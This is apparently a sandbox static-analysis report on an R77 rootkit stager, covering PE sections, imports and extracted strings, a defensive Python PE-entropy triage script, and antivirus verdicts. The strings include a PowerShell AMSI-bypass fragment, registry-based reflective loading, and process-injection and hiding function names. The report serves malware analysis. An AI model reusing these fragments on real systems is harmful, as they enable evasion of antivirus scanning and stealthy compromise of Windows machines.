Static | ZeroBOX

PE Compile Time

2025-01-10 05:07:26

PE Imphash

4a38b8722fee325fc3f6a86590c2be8a

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x00000df3    0x00000e00        6.10328378599
.rdata  0x00002000       0x00001b84    0x00001c00        3.94447200999
.rsrc   0x00004000       0x00025a38    0x00025c00        7.94065269693
.reloc  0x0002a000       0x00000140    0x00000200        4.72259056136

Resources

Name         Offset      Size        Language      Sub-language        File type
EXE          0x000040b0  0x00025800  LANG_ENGLISH  SUBLANG_ENGLISH_US  PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
RT_MANIFEST  0x000298b0  0x00000188  LANG_ENGLISH  SUBLANG_ENGLISH_US  XML 1.0 document text
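The compile time and the per-section entropy figures above can be reproduced from the file itself without a sandbox. The script below is an added example for this report, not ZeroBOX's code and not code from the sample: it walks the DOS header, IMAGE_FILE_HEADER and section table with the Python standard library only, prints TimeDateStamp as UTC and scores each section's raw bytes. The path sample.bin is an assumption; the build_sample_pe helper constructs a small stand-in PE32 image (labelled as constructed, not the analysed binary) so the script runs offline. Practitioner notes encoded in the script: a section scoring above 7.0 bits per byte (here .rsrc at 7.94, which holds the 0x25800-byte EXE resource next to GZipStream strings further down) is the usual sign of a compressed or encrypted embedded payload, and TimeDateStamp is written by the linker and trivially forged, so the compile time is a hint rather than evidence.

```python
import math
import struct
import sys
from datetime import datetime, timezone
from typing import Dict, List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant block, 8.0 for uniform bytes; ~7.9+ suggests compressed/encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def _file_header(pe: bytes) -> int:
    """Offset of IMAGE_FILE_HEADER after validating the MZ and PE\\0\\0 signatures."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return e_lfanew + 4


def compile_time(pe: bytes) -> str:
    """IMAGE_FILE_HEADER.TimeDateStamp rendered as UTC; the value is linker-written and attacker-controllable."""
    ts = struct.unpack_from("<I", pe, _file_header(pe) + 4)[0]
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def parse_sections(pe: bytes) -> List[Dict]:
    """Walk the section table (same layout for PE32 and PE32+) and score each section's raw bytes."""
    file_hdr = _file_header(pe)
    num_sections = struct.unpack_from("<H", pe, file_hdr + 2)[0]
    opt_size = struct.unpack_from("<H", pe, file_hdr + 16)[0]
    table = file_hdr + 20 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, table + i * 40)
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "entropy": shannon_entropy(raw),
        })
    return sections


def flag_packed_sections(sections: List[Dict], threshold: float = 7.0) -> List[str]:
    """Names of sections whose raw data looks compressed or encrypted (the .rsrc case in this report)."""
    return [s["name"] for s in sections if s["rawsize"] and s["entropy"] >= threshold]


def build_sample_pe(payloads: List[Tuple[bytes, bytes]], timestamp: int = 0) -> bytes:
    """Constructed minimal PE32 stand-in (NOT the analysed sample) so the script can run offline."""
    e_lfanew, opt_size, align = 0x40, 0xE0, 0x200
    n = len(payloads)
    header_len = e_lfanew + 4 + 20 + opt_size + 40 * n
    raw_ptr = (header_len + align - 1) & ~(align - 1)      # first section at the next 0x200 boundary
    image = bytearray(b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew))
    image += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, n, timestamp, 0, 0, opt_size, 0x102)
    image += struct.pack("<H", 0x10B).ljust(opt_size, b"\0")   # PE32 magic, remaining fields zeroed
    body = bytearray()
    va = 0x1000
    for name, data in payloads:
        rawsize = (len(data) + align - 1) & ~(align - 1)
        image += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                             rawsize, raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += data.ljust(rawsize, b"\0")
        va += (len(data) + 0xFFF) & ~0xFFF
    return bytes(image.ljust(raw_ptr, b"\0") + body)


def report(pe: bytes) -> List[str]:
    """Text lines mirroring the report's Compile Time and Sections fields plus the packing verdict."""
    sections = parse_sections(pe)
    lines = [f"PE Compile Time: {compile_time(pe)}"]
    for s in sections:
        lines.append(f"{s['name']:<8} VA=0x{s['va']:08x} raw=0x{s['rawsize']:08x} entropy={s['entropy']:.5f}")
    packed = flag_packed_sections(sections)
    lines.append("high-entropy sections (likely packed/compressed payload): " + (", ".join(packed) or "none"))
    return lines


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # usage: python pe_triage.py sample.bin   (the file name is an assumption)
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        # constructed stand-in: a flat NOP-filled code section and a uniform-byte "resource" section
        data = build_sample_pe([(b".text", b"\x90" * 0x600),
                                (b".rsrc", bytes(range(256)) * 32)], timestamp=1736485646)
    print("\n".join(report(data)))
```

Run it against the real file to check the table; run it with no argument and the constructed image reproduces the 2025-01-10 05:07:26 compile time from the matching TimeDateStamp and flags the uniform-byte section exactly as the 7.94-entropy .rsrc is flagged here.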

Imports

Library SHLWAPI.dll:
0x402060 StrNCatW
0x402064 StrStrIW
0x402068 StrCatW
0x40206c StrCpyW
Library KERNEL32.dll:
0x402018 SizeofResource
0x40201c FindResourceA
0x402020 GetModuleHandleA
0x402024 LockResource
0x402028 LoadResource
0x40202c GetProcAddress
0x402030 IsWow64Process
0x402034 ExitProcess
0x402038 GetCurrentProcess
0x40203c GetProcessHeap
0x402040 HeapAlloc
0x402044 lstrlenW
0x402048 HeapFree
Library ADVAPI32.dll:
0x402000 RegSetValueExW
0x402008 CryptGenRandom
0x40200c RegOpenKeyExW
0x402010 CryptReleaseContext
Library ole32.dll:
0x402078 CoCreateInstance
0x40207c CoUninitialize
0x402080 CoInitializeEx
Library OLEAUT32.dll:
0x402050 SysFreeString
0x402054 VariantInit
0x402058 SysAllocString

!This program cannot be run in DOS mode.
`.rdata
@.rsrc
@.reloc
ntdll.dll
RtlGetVersion
.text$mn
.idata$5
.rdata
.rdata$voltmd
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
StrCpyW
StrCatW
StrStrIW
StrNCatW
SHLWAPI.dll
HeapFree
lstrlenW
HeapAlloc
GetProcessHeap
GetCurrentProcess
SizeofResource
FindResourceA
GetModuleHandleA
LockResource
LoadResource
GetProcAddress
IsWow64Process
ExitProcess
KERNEL32.dll
RegOpenKeyExW
CryptReleaseContext
CryptGenRandom
CryptAcquireContextW
RegSetValueExW
ADVAPI32.dll
CoUninitialize
CoCreateInstance
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
!This program cannot be run in DOS mode.
`.reloc
v2.0.50727
#Strings
<>9__2_0
<GetExecutableFunction>b__2_0
IEnumerable`1
get_Service32
get_Dll32
Microsoft.Win32
ReadInt32
ToInt32
Func`2
get_Service64
get_Dll64
ReadInt16
ToInt16
<Module>
CreateFileA
MODULEINFO
System.IO
mscorlib
System.Collections.Generic
get_Id
processId
thread
inCreateSuspended
shareMode
EnterDebugMode
CompressionMode
SizeOfImage
Enumerable
IDisposable
GetModuleHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
inheritHandle
handle
templateFile
MapViewOfFile
module
fileName
moduleName
ControlPipeName
functionName
GetProcessesByName
LocalMachine
ValueType
allocationType
System.Core
R77ServiceSignature
R77HelperSignature
get_Culture
set_Culture
resourceCulture
Dispose
EditorBrowsableState
CompilerGeneratedAttribute
GeneratedCodeAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
SecurityPermissionAttribute
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
ReadByte
SetValue
Stager.exe
get_Size
maximumStackSize
CreateFileMapping
String
maximumSizeHigh
fileOffsetHigh
get_Length
sizeOfStack
Unhook
Global
Marshal
System.ComponentModel
BaseOfDll
UnhookDll
InjectDll
kernel32.dll
psapi.dll
ntdll.dll
msvcrt.dll
GZipStream
CopyStream
MemoryStream
stream
Program
OperatingSystem
resourceMan
numberOfBytesWritten
get_OSVersion
get_Version
System.IO.Compression
GetModuleInformation
destination
System.Globalization
SecurityAction
System.Reflection
GetExecutableFunction
creationDisposition
Exception
moduleInfo
CultureInfo
numberOfBytesToMap
System.Linq
Buffer
buffer
get_ResourceManager
Stager
System.CodeDom.Compiler
Helper
parameter
BitConverter
get_Major
.cctor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
Stager.Properties.Resources.resources
DebuggingModes
Stager.Properties
flagsAndAttributes
fileMappingAttributes
objectAttributes
securityAttributes
Contains
System.Security.Permissions
desiredAccess
access
OpenProcess
GetCurrentProcess
process
baseAddress
startAddress
address
Decompress
stackZeroBits
Concat
fileMappingObject
GetObject
Inject
Select
oldProtect
VirtualProtect
newProtect
protect
RvaToOffset
IsExecutable64Bit
op_Explicit
Environment
EntryPoint
Decrypt
attributeList
R77Const
maximumSizeLow
fileOffsetLow
VirtualAllocEx
NtCreateThreadEx
HidePrefix
ToArray
OpenSubKey
RegistryKey
get_Assembly
memcpy
BlockCopy
FreeLibrary
WriteProcessMemory
Registry
op_Equality
op_Inequality
System.Security
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
3System.Resources.Tools.StronglyTypedResourceBuilder
17.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
_CorExeMain
mscoree.dll
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Microsoft Base Cryptographic Provider v1.0
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
SYSTEM
ESOFTWARE
$77stager
$77svc32
$77svc64
powershell
function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]$ReturnType)$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(`ReflectedDelegate`)),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(`InMemoryModule`,$False).DefineType(`MyDelegateType`,`Class,Public,Sealed,AnsiClass,AutoClass`,[MulticastDelegate]);$TypeBuilder.DefineConstructor(`RTSpecialName,HideBySig,Public`,[Reflection.CallingConventions]::Standard,$ParameterTypes).SetImplementationFlags(`Runtime,Managed`);$TypeBuilder.DefineMethod(`Invoke`,`Public,HideBySig,NewSlot,Virtual`,$ReturnType,$ParameterTypes).SetImplementationFlags(`Runtime,Managed`);Write-Output $TypeBuilder.CreateType();}$NativeMethods=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(`System.dll`)}).GetType(`Microsoft.Win32.UnsafeNativeMethods`);$GetProcAddress=$NativeMethods.GetMet
[Runtime.InteropServices.Marshal]::Copy([Byte[]](
),0,$AmsiScanBufferPtr,
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBufferPtr,[uint32]8,0x20,[ref]$OldProtect);
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invoke($Null,$Null)
Get-Delegate
ParameterTypes
ReturnType
TypeBuilder
NativeMethods
GetProcAddress
LoadLibraryDelegate
VirtualProtectDelegate
Kernel32Ptr
LoadLibraryPtr
VirtualProtectPtr
AmsiPtr
AmsiScanBufferPtr
OldProtect
'+[Char](
[Byte](
ReflectiveDllMain
ntdll.dll
kernelbase.dll
kernel32.dll
SOFTWARE
$77dll32
$77dll64
winlogon
C:\Windows\System32\
Stager.Properties.Resources
Service32
Service64
$77control
Service32
Service64
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Rootkit.4!c
tehtris Generic.Malware
ClamAV Win.Rootkit.R77-10009366-0
CMC Clean
CAT-QuickHeal Trojan.Ghanarava.17402663771e6c97
Skyhigh BehavesLike.Win32.Dropper.cc
ALYac Gen:Variant.Zusy.545412
Cylance Unsafe
Zillya Rootkit.Agent.Win32.54182
Sangfor Trojan.Win32.Save.a
K7AntiVirus RootKit ( 005aee0e1 )
Alibaba Trojan:MSIL/CrypterX.85b3ea26
K7GW RootKit ( 005aee0e1 )
Cybereason Clean
huorong HackTool/HideProc.a
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Rootkit.Agent.OEM
APEX Malicious
Avast Win32:MalwareX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.MSIL.R77.gen
BitDefender Gen:Variant.Zusy.545412
NANO-Antivirus Trojan.Win32.R77.kvosye
ViRobot Clean
MicroWorld-eScan Gen:Variant.Zusy.545412
Tencent Malware.Win32.Gencirc.11d1b55b
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/Dropper.MSIL.Gen
DrWeb Trojan.BankBot.565
VIPRE Gen:Variant.Zusy.545412
TrendMicro Clean
McAfeeD Real Protect-LS!F3B37711B4FD
Trapmine malicious.moderate.ml.score
CTX exe.trojan.msil
Emsisoft Gen:Variant.Zusy.545412 (B)
Ikarus Trojan.Win32.Rootkit
FireEye Generic.mg.f3b37711b4fdccff
WebrootD Clean
Jiangmin Clean
Webroot Clean
Varist W32/MSIL_Agent.HNK.gen!Eldorado
Avira TR/Dropper.MSIL.Gen
Fortinet W32/Agent.OEM!tr.rkit
Antiy-AVL Trojan/MSIL.r77
Kingsoft MSIL.Trojan.R77.gen
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Zusy.D85284
SUPERAntiSpyware Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Trojan/Win.Generic.R630595
Acronis suspicious
McAfee Artemis!F3B37711B4FD
MAX malware (ai score=80)
VBA32 Clean
Malwarebytes Rootkit.r77
Panda Trj/Genetic.gen
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002H09AD25
Rising Rootkit.Agent!8.F5 (TFE:3:Ma4kQLHBcuO)
Yandex Trojan.R77!WjNcS2kCzFs
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.318374676.susgen
GData Gen:Variant.Zusy.545412
AVG Win32:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Clean
No IRMA results available.